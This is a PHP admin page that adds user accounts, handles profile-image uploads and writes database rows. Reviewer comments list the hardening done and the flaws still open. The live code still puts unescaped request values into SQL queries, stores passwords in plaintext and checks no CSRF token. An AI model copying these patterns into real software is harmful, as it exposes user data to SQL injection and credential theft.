//var/www/50mmla/admin/userAdd.php
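<?php
/**
 * Admin page: add a user account.
 *
 * Flow, as visible in this file:
 *   1. Load the shared includes and refuse the request unless has_permission()
 *      accepts this page's id (the script name without ".php").
 *   2. On a POSTed "register" field: check that the username is unused, store the
 *      optional profile image, insert the row into 50mm_users and, when userType
 *      is not 'WEB', insert a matching row into 50mm_permissions.
 *   3. Render the form followed by the status message in $html.
 *
 * Hardening applied here: full "<?php" open tags (with short_open_tag disabled the
 * source would be served as text), SCRIPT_NAME instead of PHP_SELF, POST-only
 * handling, content-based image checks with move_uploaded_file(), and database
 * errors written to the log instead of the response.
 *
 * NOTE(review): still open, because the fix needs code that is not in this file:
 *   - Request values are interpolated into SQL strings. The $db wrapper's
 *     escaping or prepared-statement API is not visible here; every value
 *     placed in a query below must go through it.
 *   - The password is stored exactly as submitted. Moving to password_hash()
 *     and password_verify() has to be done together with the login check.
 *   - No anti-CSRF token is checked in this file; confirm whether appTop.php or
 *     sessions.php enforces one for this state-changing form.
 */
include_once('../includes/static/configure.php');
include_once('../includes/static/util.php');
include_once('../includes/static/dbcon.php');
include_once('../includes/static/gdimg.php');
include_once('../includes/static/sessions.php');
include_once('includes/static/util.php');
include_once('includes/appTop.php');

// PHP_SELF also carries any trailing path info from the request URL, so its
// basename is client-influenced. SCRIPT_NAME names the script that is running,
// which is what the permission lookup has to be keyed on.
$page_id = str_replace(".php", "", basename($_SERVER['SCRIPT_NAME']));
if (!has_permission($page_id)) {
    die("You don't have permission to view this page!");
}

$html = "";

// The form submits by POST; creating an account is not accepted from the query
// string or cookies (which $_REQUEST would also read).
if (isset($_POST['register'])) {
    $email    = isset($_POST['email']) ? $_POST['email'] : '';
    $url      = isset($_POST['website']) ? $_POST['website'] : '';
    $uname    = isset($_POST['username']) ? $_POST['username'] : '';
    $password = isset($_POST['password']) ? $_POST['password'] : '';
    // NOTE(review): the userType <select> is commented out in the form below, so
    // this is normally absent. The INSERT hard-codes 'WEB' while the permissions
    // row is created whenever this value is not 'WEB' -- confirm the intent.
    $user_type = isset($_POST['userType']) ? $_POST['userType'] : '';
    $profile   = get_html_text(isset($_POST['profile']) ? $_POST['profile'] : '');
    $ip        = get_client_ip();

    // name and type are supplied by the client; only tmp_name, size and error
    // are set by PHP itself.
    $upload    = isset($_FILES['file']) ? $_FILES['file'] : array();
    $cur_file  = isset($upload['name']) ? $upload['name'] : '';
    $cur_temp  = isset($upload['tmp_name']) ? $upload['tmp_name'] : '';
    $cur_mime  = isset($upload['type']) ? $upload['type'] : '';
    $cur_size  = isset($upload['size']) ? $upload['size'] : 0;
    $cur_error = isset($upload['error']) ? $upload['error'] : UPLOAD_ERR_NO_FILE;

    // First check that the username is not already taken.
    // NOTE(review): $uname is interpolated unescaped -- see the file header.
    $sql = "SELECT user_id FROM 50mm_users WHERE username ='$uname'";
    if (!($result = $db->sql_query($sql))) {
        $sql_error = $db->sql_error();
        // Driver messages expose schema details; keep them in the server log.
        error_log('userAdd.php: username lookup failed: ' . $sql_error['message']);
        die("Database error");
    }

    if ($db->sql_numrows($result) < 1) {
        // Username is unique, so add this user.
        // Store the profile image on the server; it stays "" when none is accepted.
        $unique_name = "";
        $valid = validate_content($cur_error, $cur_mime, $cur_size, $cur_file, PROFILE_MAX_KB);
        if ($valid['result']) {
            // Decide from the file's content, not from the client-declared MIME
            // type: the temp file must be a real upload that getimagesize() can parse.
            $image_info = is_uploaded_file($cur_temp) ? getimagesize($cur_temp) : false;
            if ($image_info === false) {
                die("Failed Image Upload");
            }

            $unique_name = get_unique_filename($cur_file);

            // getimagesize() reads only the image header, so the stored name is
            // also limited to image extensions. The upload directory should
            // additionally be configured so the web server never executes files
            // in it.
            $extension = strtolower(pathinfo($unique_name, PATHINFO_EXTENSION));
            if (!in_array($extension, array('jpg', 'jpeg', 'gif', 'png'), true)) {
                die("Failed Image Upload");
            }

            $target = ROOT_DIR . PROFILE_IMG_DIR . $unique_name;

            // Check to see if the image needs resizing.
            if (($image_info[0] > PROFILE_IMG_WIDTH) || ($image_info[1] > PROFILE_IMG_HEIGHT)) {
                // Create the image resource.
                $gd = new gd_img($cur_mime, $cur_temp);
                if (!$gd->img_id) {
                    die($gd->gd_error);
                }
                // Scale the image.
                // NOTE(review): PROFILE_IMG_WIDTH is passed twice; the second
                // argument may have been meant to be PROFILE_IMG_HEIGHT --
                // confirm against gd_scale_img()'s signature.
                $scaled = $gd->gd_scale_img(PROFILE_IMG_WIDTH, PROFILE_IMG_WIDTH, IMG_QUALITY);
                if (!$scaled) {
                    die($gd->gd_error);
                }
                // Write the scaled image.
                $res = $gd->gd_create_img($scaled, $target);
                if (!$res) {
                    die($gd->gd_error);
                }
            } else {
                // move_uploaded_file() re-checks that the source is this
                // request's upload before moving it, which copy() does not.
                if (!move_uploaded_file($cur_temp, $target)) {
                    die("Failed Image Upload");
                }
            }
        }

        // NOTE(review): all interpolated values are unescaped and $password is
        // stored as submitted -- see the file header.
        $sql = "INSERT INTO 50mm_users (user_type,email,username,password,image,profile,url,ip,verified,entry_time) VALUES ('WEB','$email','$uname','$password','$unique_name','$profile','$url','$ip',1,NOW())";
        if (!($result = $db->sql_query($sql))) {
            $sql_error = $db->sql_error();
            error_log('userAdd.php: user insert failed: ' . $sql_error['message']);
            die("Database error");
        }

        if ($user_type != 'WEB') {
            $sql = "SELECT LAST_INSERT_ID() AS id";
            if (!($result = $db->sql_query($sql))) {
                $sql_error = $db->sql_error();
                error_log('userAdd.php: LAST_INSERT_ID lookup failed: ' . $sql_error['message']);
                die("Database error");
            }
            $row = $db->sql_fetchrow($result);
            // Force an integer so the value placed in the next query is numeric.
            $id = (int) $row['id'];

            $sql = "INSERT INTO 50mm_permissions (user_id) VALUES ('$id')";
            if (!($result = $db->sql_query($sql))) {
                $sql_error = $db->sql_error();
                error_log('userAdd.php: permissions insert failed: ' . $sql_error['message']);
                die("Database error");
            }
        }
        $html = "<div class=\"hilite\">operation successful</div>";
    } else {
        $html = "<div class=\"error\">username is not unique</div>";
    }
}

include_once('includes/header.php');
//content
?>
<br>
<script>registerDivs = new Array('username','email','password');</script>
<form action="<?php echo htmlspecialchars($_SERVER['SCRIPT_NAME'], ENT_QUOTES, 'UTF-8'); ?>" method="post" enctype="multipart/form-data" onSubmit="return validateForm(this,registerDivs,'errorRegister');">
<table cellspacing="0" cellpadding="4" border="0">
  <tr>
    <td colspan="2"><span class="title">ADD USER</span><br> MAKE SURE YOU REMEMBER THE PASSWORD.
    AFTER A PERSON IS REGISTERED YOU WILL NOT BE ABLE TO EDIT THEIR PASSWORD INFO AND THEY WILL NOT BE ABLE TO RETRIEVE IT.</td>
  </tr>
  <tr>
    <!--<td>User Type</td> <td> <select name="userType"> <option value="WEB">WEB</option> <option value="EDITOR">EDITOR</option> <option value="ADMIN">ADMIN</option> </select>--> </td>
  </tr>
  <tr>
    <td>Email<span id="erremail" class="error" style="visibility:hidden;"> *</span></td>
    <td><input type="text" name="email" value="" class="field" maxlength="120"></td>
  </tr>
  <tr>
    <td>Username<span id="errusername" class="error" style="visibility:hidden;"> *</span></td>
    <td><input type="text" name="username" value="" class="field" maxlength="30"></td>
  </tr>
  <tr>
    <td>Password<span id="errpassword" class="error" style="visibility:hidden;"> *</span></td>
    <td><input type="password" name="password" value="" class="field" maxlength="30"></td>
  </tr>
  <tr>
    <td>Website <em>(optional)</em></td>
    <td><input type="text" name="website" value="http://" class="field"></td>
  </tr>
  <tr>
    <td>Profile Image <em>(optional)</em></td>
    <td><input type="file" name="file" class="field"></td>
  </tr>
  <tr valign="top">
    <td>Profile Text <em>(optional)</em></td>
    <td><textarea class="body" name="profile" style="width: 400px; height: 200px;"></textarea></td>
  </tr>
  <tr>
    <td> </td>
    <td> <input name="register" type="submit" class="button" value="Regsiter"><br>
      <div id="errorRegister" class="error" style="visibility:hidden;">Please correct the fields marked by *</div>
    </td>
  </tr>
</table>
</form>
<?php echo $html; ?>
<?php
// Disabled user listing, kept as found. If it is ever re-enabled, $user_type must
// not be interpolated into the query and the link URLs need HTML escaping.
/*
//set active
$sql = "SELECT user_id,username,password,email,image,profile,url,banned,ip,entry_time FROM 50mm_users WHERE user_type='$user_type'";
if( !($result = $db->sql_query($sql)) ){ $sql_error = $db->sql_error(); die($sql_error['message']); }
$modrows = Array();
while ($row = $db->sql_fetchrow($result)){
    $id = $row['user_id'];
    $row['url'] = get_trim_string($row['url'],30);
    $xtras = Array(
        "edit"=>"<a href=\"".$_SERVER['PHP_SELF']."?userId=$id&action=edit\">edit</a>",
        "delete"=>"<a href=\"".$_SERVER['PHP_SELF']."?userId=$id&action=delete\">delete</a>"
    );
    unset($row['user_id']);
    $all = array_merge($row,$xtras);
    array_push($modrows, $all);
}
echo(get_table($modrows));
*/
?>
<?php
include_once('includes/footer.php');
include_once('includes/appBottom.php');
?>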